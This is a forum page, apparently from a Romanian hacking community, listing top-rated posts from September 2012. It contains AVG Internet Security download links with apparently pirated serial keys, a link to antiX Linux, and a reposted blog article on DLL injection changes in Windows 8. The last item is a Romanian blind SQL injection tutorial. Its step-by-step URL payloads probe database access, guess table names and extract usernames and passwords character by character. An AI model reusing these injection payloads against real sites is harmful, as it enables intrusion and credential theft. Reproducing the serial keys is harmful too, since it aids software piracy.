Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/07/12 in all areas

  1. Download: AVG Internet Security 2013 32-bit Trial http://aa-download.avg.com/filedir/inst/avg_isct_x86_all_2013_2667a5738.exe Download: AVG Internet Security 2013 64-bit Trial http://aa-download.avg.com/filedir/inst/avg_isct_x64_all_2013_2667a5738.exe seriale : 8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED 8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED 8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED 64bits 8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED 8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED 8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED 8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED sursa : softexia.com edit//reupload! funcioneaza
    1 point
  2. antiX is a fast, lightweight and easy to install linux live CD distribution based on Debian Testing and MEPIS for Intel-AMD x86 download : Download antiX-Linux from SourceForge.net (731.9 MB) compatible systems.
    1 point
  3. [h=2]DLL Injection and Windows 8[/h]By Nagareshwar Talekar on Sep 7 2012 Recently while working on new version of RemoteDLL, I discovered interesting changes around DLL injection on Windows 8. Before I actually talk about new changes, here is little background story. CreateRemoteThread is most common method used for DLL injection. It used to work flawlessly till Windows XP. However since Vista, it changed the colors, mainly it could no more inject DLL across sessions. This was attributed to new ‘Session Separation’ feature introduced in Vista. To beat that limitation, we discovered new undocumented method NTCreateThread which could inject DLL across session boundaries on Vista/Win7. Now while testing RemoteDLL on Windows 8, I tried (halfheartedly) injecting DLL into process running in Session 0. And to my utter surprise it worked just like magic in old days. I tried again to make sure that I am not dreaming So it looks like M$ has put things back in order. The question arises whether CreateRemoteThread changes in Vista was done intently or accidentally. Because we could still use NTCreateThread with little risk. Quick analysis point us to other direction. CreateRemoteThread actually calls NTCreateThread somewhere down the layer. May be some extra checking code that was added in Vista actually caused CreateRemoteThread to exit. So it is possible that this extra code was for something else but it adversely blocked injection across sessions. Now Microsoft may have realized the problem and must have fixed it to work normally. On the other hand, CreateRemoteThread have legitimate uses and certainly some of its big customers may have made the noise To conclude, now CreateRemoteThread works well in Windows 8 across sessions (tested with consumer edition). However we still have to rely on NTCreateThread on Vista/Win7 for injection beyond session boundaries. Another notable change that I have observed is w.r.t Reference Count or Load Count for DLLs. Few years back, we have written research article ‘The covert way to find the Reference Count of DLL’ explaining about hidden/undocumented Load Count field in LDR_MODULE structure. struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; PEB within each process stores information on all Loaded DLLs in an linked list. Each dll in this list is represented by LDR_MODULE structure. One of the important but undocumented field here is ‘LoadCount’ (reference count of dll). This ‘Load Count’ plays an important role in deciding when the DLL has to be completely unloaded from the process. It is also useful in Removing Injected DLL from the running process. Even our tools, RemoteDLL and SpyDLLRemover use it while removing Malware DLLs from process. Here is the screenshot of RemoteDLL showing Load Count for all DLLs in selected process. As you see LoadCount for static DLL is set to -1 as usual but for dynamically loaded DLLs it is set to 6. So where the hell it has gone? It has to be somewhere as every process needs it. It is possible that LDR_MODULE structure may have changed or some of its fields may have altered or it is moved somewhere else altogether. We have to dig further. This is just the tip of iceberg, more reversing will reveal the real truths. And as I discover more, I will put it here. Meanwhile if you find any interesting things around it do share ! Sursa: DLL Injection and Windows 8 | SecurityXploded Blog
    1 point
  4. Un nou concept. sau
    1 point
  5. Blind SQLi Injection .Slacker 30 August 2012 Sa luam ca exemplu: http://www.site.com/news.php?id=5 http://www.site.com/news.php?id=5 and 1=1 <= unde 1=1 este adevarat http://www.site.com/news.php?id=5 and 1=2 <= unde 1=2 este fals 1. MySQL Pentru blind vom folosii substring. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 Inlocuim 4 cu 5 daca query-ul este adevarat. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2. Subselect Cand nu functioneaza vom folosii subselect. http://www.site.com/news.php?id=5 and (select 1)=1 Acum vom vedea daca avem acces la mysql.user http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 Daca pagina se incarca in mod normal, avem acces la mysql.user 3. Verificarea numelui tabelelor si coloanelor http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (cu limit 0,1 query-ul rezulta un rand de date din cauza subselect-ului. Daca pagina se incarca in mod normal, fara continut lipsa, exista. Daca avem FALSE lipsete un articol schimbam doar numele tabelului pana cand il ghicim. Sa zicem ca numele tabelului cu utilizatori este users. Acum avem nevoie de numele coloanei. http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Daca pagina se incarca in mod normal, inseamna ca numele coloanei este Password. Avem o coloana cu parola. 4. Extragerea datelor din baza de date Daca am gasit tabelul cu utilizatori si coloana, parola si numele de utilizator, vom extragere caracterele din lista. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Convertim caracterul 1 in valoare ASCII ( ASCII() ) Vom incerca sa ajungem la FALSE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Am ajuns la TRUE si trebuie sa pastram incrementarea. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Avem TRUE din nou. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Acum avem FALSE. Primul caracter din USERNAME este char(99) Convertim in ASCII: char(99) este scris 'c'. Sa verificam al doilea caracter: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Am schimbat ,1,1 in ,2,1 pentru a obtine al doilea caracter. Acum ne intorcem la caracterul 1: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Pagina ar trebuii sa se incarce in mod normal deci este TRUE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 Este fals si reducem numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Este adevarat si ridicam numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 Fals. Deci al doilea caracter este char(105) si este 'i', si avem 'ci' in masura atunci ca incrementam pana la sfarsit atunci cand >0 returneaza fals (FALSE) stim ca ajungem la final. Sper ca am ajutat cu acest tutorial
    -1 points
×
×
  • Create New...